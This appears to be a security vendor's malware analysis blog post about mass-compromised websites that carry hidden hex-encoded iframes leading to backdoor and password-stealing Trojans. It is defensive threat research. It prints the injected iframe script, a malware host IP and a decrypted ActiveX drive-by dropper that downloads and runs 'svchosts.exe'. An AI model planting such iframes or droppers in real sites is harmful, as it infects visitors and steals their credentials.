Long Tail Sites Come Under Attack

Thousands of middle tier websites have been compromised with malicious iframes which load exploit code designed to surreptitiously install backdoor Trojans onto susceptible victim computers. If a webmaster’s system is infected, the Trojans will attempt to steal FTP credentials which are then used to compromise additional sites and host servers. As a result, the number of compromised sites is increasing exponentially. These sites comprise the so-called ‘long tail’ of the web – thus while none of the sites individually are high volume, collectively the sites garner substantial visitors. Currently, one in every two ScanSafe customers attempts to access the impacted sites. Much of the traffic being directed to the compromised sites is via search engines. In some cases, the onset of the compromise was immediately followed with sponsored ad placement, indicating the possibility that the attackers were actively seeking to attract visitors to the affected sites. As an example, the website watchmaster.org was compromised and subsequently heavily advertised via sponsored links appearing on Nextel, shopping.aol.com, bizrate, and similar ecommerce sites. Following is an example screenshot of one such advertisement:

Note: According to Google, only 186 sites linked to watchmaster.org, and most or all of these appeared to be related to the placement of the sponsored links:

In each attack, the site compromised site is outfitted with a hexadecimal encoded iframe which when decoded has one of the following formats:

window.status=’Done’;document.write(‘<iframe name=#### src=\’URL?’+Math.round(Math.random()*######)+’##\’ width=### height=### style=\’display: none\’></iframe>’)

In nearly all cases, the malicious iframe is appended to the page after the closing <html> tag. Following is a partial example of the hex-encoded script:

<script>eval(unescape(“6964%6f2e%

7361753d44%6f65%

2764636d%6574%2e72%

6965%283c%69726d

2061%6d3d%383930

3064622072%635c%

27%6874%702f

The placement of the hex-encoded iframe is after the closing html tag (</html>) which may result in the compromise not being detectable by some web spiders/crawlers – including many of those used for security purposes. The screenshot below shows the results in Yahoo (which uses web crawling and community-based reporting for SearchScan). As seen, Yahoo’s SearchScan is unable to detect the malware embedded in the marlinatlantis.com site:

The following screenshot shows the same search results using Scandoo, which scans search results in realtime and is able to detect the embedded malicious iframe:

Various malware host domains are involved in the compromise. A sample of the domains directly or indirectly related include: 58.65.232.33 81.29.241.70 64.46.39.14 64.28.187.29 ikarus-security.com traffurl.ru x-victory.ru The core malware hosts involved demonstrate specific behavior that is indicative of their being directly related to one another. In an attempt to avoid suspicion the malware sites are sporadically unavailable. When live, they return a bogus 404 message (page not found) which contains hidden and heavily obfuscated malicious script. A sample of the bogus 404 page containing the heavily encrypted script is seen in the screenshot below:

The decoded version is as follows:

window.status=’Done’; document.write (‘<i frame name=7a src=\’http://88.255.74.226/pack/index.php? ‘+ Math.round(Math.random ()*174915)+’3387323 df\’ width= 507 height= 345 style=\’display: none\’> </i frame>’)

The IP address resolves to an international route block in Turkey. At the time of investigation, the site targeted by the iframe was not reachable.

When decrypted, the result is as follows:

gogogo();
;function gogogo() {
var sende = document.createElement(‘object’);
sende.setAttribute(‘id’,’sende’);

try {

var asq = sende.CreateObject(‘ms’+”xm”+’l2’+”

var ass = sende.CreateObject(“Shell.Application”,”);
var asst = sende.CreateObject(‘adod’+”b.”+’st’+”re”+’am’,”);

try { asst.type = 1;

asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = ‘.//..//svchosts.exe’;
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}};
function gogogo() {

var sende = document.createElement(‘object’);
sende.setAttribute(‘id’,’sende’);

var ass = sende.CreateObject(“Shell.Application”,”);
var asst = sende.CreateObject(‘adod’+”b.”+’st’+”re”+’am’,”);
try { asst.type = 1;

asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = ‘.//..//svchosts.exe’;
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}};

Successful exploit leads to the installation of a variant of the Zapchast backdoor and Ldpinch password stealer Trojan families.

The backdoor gives attackers full access to the compromised systems, after which they are able to take any action on the computer that the logged in legitimate user could perform.

The keylogger captures (among other things) any FTP credentials discovered, which are then used by the attacker(s) to compromise additional websites and web servers. This leads to exponential growth in both the number of compromises and the number of victim computers outfitted with backdoors and keyloggers.

According to geo-data captured during the course of the compromises, the United States (83%) and the United Kingdom (8%) appear to be the largest targets:

UNITED STATES 83%
UNITED KINGDOM 8%
GERMANY 2%
NETHERLANDS 1%
RUSSIA 1%
THAILAND 1%
SPAIN 1%
CZECH REPUBLIC 1%

Growth of the attacks can be seen in the charts below:

This form was completed by: Mary Landesman

  1. Chưa có phản hồi.
  1. No trackbacks yet.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: